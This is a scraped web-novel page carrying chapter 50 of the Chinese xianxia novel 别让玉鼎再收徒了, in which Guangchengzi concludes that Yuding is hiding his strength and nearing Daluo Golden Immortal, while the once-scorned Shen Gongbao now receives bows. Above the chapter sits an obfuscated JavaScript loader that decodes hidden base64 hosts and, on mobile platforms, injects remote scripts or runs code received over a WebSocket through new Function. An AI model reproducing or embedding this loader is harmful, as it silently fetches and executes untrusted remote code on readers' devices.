笔趣阁

字:
关灯 护眼
笔趣阁 > 别让玉鼎再收徒了 > 第50章 玉鼎要证道大罗了
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第50章 玉鼎要证道大罗了

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
高空之上,两团白云飘然而行。
  一团云上是广成子和赤精子,另一团上是道行天尊和灵宝大法师。
  三人有说有笑,还在讨论之前论道的内容,只有赤精子皱着眉一言不发。
  “广成师兄,两位师弟,不知你们可曾发现玉鼎似乎有何不对?”赤精子最终开口。
  “不对?”道行天尊和灵宝大法师对视一眼。
  这边广成子神情凝重下来:“师弟也发现了么?”
  赤精子沉吟道:“玉鼎的修炼似乎……”
  “玉鼎可能是我们中第一个突破大罗金仙的。”广成子沉吟道。
  赤精子想说玉鼎修炼似乎出了问题的话硬生生被打断,一脸吃惊与错愕:“大罗???”
  一旁的道行天尊还有灵宝大法师也愣了一瞬,有些茫然的相视一眼。
  他们既没有看出赤精子说的不对,也没有看出广成子说的玉鼎第一个晋升大罗的征兆。
  广成子缓缓点头:“我从他的天河剑道上看到了一丝剑域的真意……”
  “剑域!”赤精子三人这次脸上露出深深的震惊。
  剑域对于玉鼎有什么重要意义,自然不言而喻。
  赤精子错愕道:“可是我看出他的境界似乎……”
  “他在藏拙!”
  广成子沉声断然道。
  “藏拙?”赤精子愣了愣。
  “你们难道忘了么,之前师尊讲道只有他一个人进入悟道状态,悟道一月。”
  广成子苦笑道:“还有我花了上千载岁月悟出打磨成的阴阳剑道被他片刻领悟,这悟性,我们中还有谁比得上?”
  赤精子三人神情不由的一震,他们马上想到了元始讲道时和他们悟道时玉鼎的表现。
  经过广成子一分析,他们这才发现好像忽略了重点。
  道行天尊默然道:“那玉鼎师兄为什么要藏拙,还整日跟黄龙厮混……”
  他比玉鼎入门稍晚一些,但也是元始亲自称赞过的四人之一。
  因此初始他对这位师兄也有结交的意思。
  只是当玉鼎选择和黄龙那憨货混在一起后便让他不想在师兄弟的基础上让关系更进一步了。
  “谁知道呢!”广成子抬头怅然一叹:“可能……他比较喜欢低调吧!”
  “低调……”道行天尊默然,有些不服气。
  纵是赤精子也不由露出一分无奈苦笑:“玉鼎这家伙……藏的也太狠了。
  我之前还在想我们中谁可以拔得头筹,第一个证道大罗,没想到竟然是玉鼎这家伙。”
  “这没什么不好的,但是切记此事只有你们知道就行了。”
  广成子看向几人警告道:“绝对不要外传,玉鼎证道大罗金仙对师尊,对玉虚宫,包括对我们都是是一件好事,这样碧游宫那帮家伙就无法拿这点笑话我们了……”
  “知道了,师兄!”
  赤精子三人点头点头,神情不一而同。
  ……
  玉虚宫。
  以玉鼎为首的四位靓仔漫步在圣境中。
  “见过四位师兄,申师……兄!”
  不管模样老的少的,但凡见到他们都要躬身行上一礼。
  然后,神情复杂的看上一眼比四人略后一些的黑衣小跟班,再行上一礼。
  申公豹入门其实并不晚,但是奈何出身不好,所以在宫中总是遭受异样的眼光。
  不过现在不同往日了。
  他们也实在不懂这家伙到底什么运气,竟然承蒙玉鼎师兄看中。
  而玉鼎师兄呢,又跟太乙、黄龙、道德真君几位师兄的关系不浅,所以,申公豹的待遇就提高了。
  或者,用恢复原本待遇更准却一些。
  “不用……用……多礼!”
  申公豹微笑着向行礼的弟子抬手,眼中泪光闪烁,玉鼎笑着拍拍他的肩膀。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师